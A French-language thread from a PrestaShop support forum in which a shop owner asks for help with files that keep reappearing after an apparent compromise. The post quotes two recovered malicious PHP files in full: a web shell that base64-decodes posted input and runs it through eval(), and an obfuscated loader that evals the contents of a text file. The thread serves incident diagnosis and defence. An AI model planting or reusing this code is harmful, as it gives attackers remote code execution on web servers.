Récemment
-
date_upd produits
Bugs & Améliorations il y a environ 10 jours13 -
Champ description longue pour les catégories
Modules il y a environ 12 jours5 -
Erreurs suite à la mise à jour
Questions relatives à l'installation/upgrade il y a environ 18 jours10 -
Modification sur le thème "Craft"
Questions relatives à l'installation/upgrade il y a environ 26 jours2 -
Module personnalisation de produit
Modules il y a environ 30 jours3 -
Theme non fonctionnel - après MAJ de la Phenixsuite 1.6.2.32
Questions relatives à l'installation/upgrade 27 févr. 2025, 10:2113 -
TinyMCE
Bugs & Améliorations 16 févr. 2025, 18:202 -
Déclinaisons virtuelles avec fichiers
PhenixSuite 14 févr. 2025, 17:4610 -
[RESOLU]Lien téléchargement dans le mail
Discussion générale 14 févr. 2025, 17:436 -
[RESOLU]RGPD
Modules 10 févr. 2025, 17:035 -
Compatibilité des modules
Discussion générale 8 févr. 2025, 17:532 -
[RESOLU]Bug page Préférences Produits
Bugs & Améliorations 7 févr. 2025, 13:254 -
htaccess chatouilleux ?
Bugs & Améliorations 5 févr. 2025, 16:5814 -
Installation depuis boutique 1.6.1.17
Questions relatives à l'installation/upgrade 5 févr. 2025, 13:0819 -
[RESOLU]Module réassurance, permettre le html
Modules 31 janv. 2025, 14:154 -
Des modules et des hacks - liste non exhaustive des modules présentant un risque
Discussion générale 12 déc. 2024, 14:1517 -
Thème enfant
PhenixSuite 12 déc. 2024, 04:0216 -
SumUp Payments Constant Update Request
Modules 3 déc. 2024, 16:092 -
PaypalAPI erreur
PhenixSuite 28 nov. 2024, 09:4553 -
Problèmes de prix avec plusieurs devises et PayPal
PhenixSuite 27 nov. 2024, 01:156
Nouvelle attaque ?
-
Bonjour à tous,
Je constate sur mon presta certaines modifications anormales, en tout cas non souhaitées qui me laisse penser à une attaque.
Voici en quelques mots ce que j'ai pu observer :
Modification du htaccess
Creation de fichiers 1.mcm.x86_64, confcom.php, conf.php, lowpr.php,...
Malgré la suppression des fichiers indésirables et le rétablissement du htaccess, cela revient régulièrement.
J'ai passé le scan de sécurité cleaner.php de @eolia qui ne détecte pas de virus.
Quelqu'un a-t-il été confronté à cela auparavant ? Et si oui, quelles sont les actions à mener ?Merci pour vos réponses.
-
Quelle version de Presta ?
-
Désolé pour l'oubli : il s'agit de 1.7.2.4
-
Avant que vous ne supprimiez quoi que ce soit, Cleaner ne trouve rien ?
-
Non !
Il y a bien des alertes de modification mais après vérification, c'est normal.
Aucune modification en rouge.
-
il y a quoi dans les fichiers que vous avez supprimé ?
-
Le fichier 1.mcm.x86_64 est trop long pour être transmis tel quel.
Le fichier confcom.php est vide
Le fichier conf.php est le suivant :
<!DOCTYPE html>
<html>
<head>
<title>PHP command</title>
</head>
<body>
<form method="post" action="">
<input type="text" name="php" id="php">
<input type="submit" value="Execute">
</form>
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$php = $_POST['php'];
$php = strtr($php, '-', '=');
$php = base64_decode($php);
if($php) {
$result = eval($php);
echo $result;
}
}
?>
</body>
</html>Le fichier lowpr.php est le suivant :
<?php
$table_prefix = "wbzaxsye6w4_duevcwondme";
$table_prefix = str_replace(array("z", "x", "y", "u", "v", "w", "n", "m"), "", $table_prefix);
$txt_contents = "1f2i3l4e5_6g7e8t9_0c1o2n3t4e5n6t7s8";
$txt_contents = preg_replace("/\d+/", "", $txt_contents);
$wp_content = $txt_contents("lowpr".".txt");
eval/Designed with utility, safety and style/($table_prefix($wp_content));
?>J'espère que cela vous donnera des idées car je suis pas compétent !
Merci par avance
-
Bah je ne comprends pas que Cleaner ne les trouve pas avec de telles fonctions à l'intérieur. (eval() par exemple)
-
J'ai oublié : j'ai passé cleaner.php après avoir supprimé les fichiers ...
Cela ne change rien dans les faits car ils reviennent ce qui signifie que l'infection vient d'un autre fichier ou d'une faille qui, lui /elle n'a pas été détecté ...
-
Par contre il faut comprendre les limites du système.
La version 1.7 c'est plus d'un million de lignes de code (contre 300 000 pour les 1.6) et cleaner ne peut pas scanner tous les fichiers/répertoires surtout que j'ai arrêté de suivre leurs évolutions.
Un autre élément à contrôler: pas d'autres CMS sur le même hébergement (WordPress ou autre) ni de répertoires inconnus (créés par vous et non-scannés) ?
-
@RPro a dit dans Nouvelle attaque ? :
eval/Designed with utility, safety and style/($table_prefix($wp_content));
Cela ressemble pas mal à une attaque pour wordpress.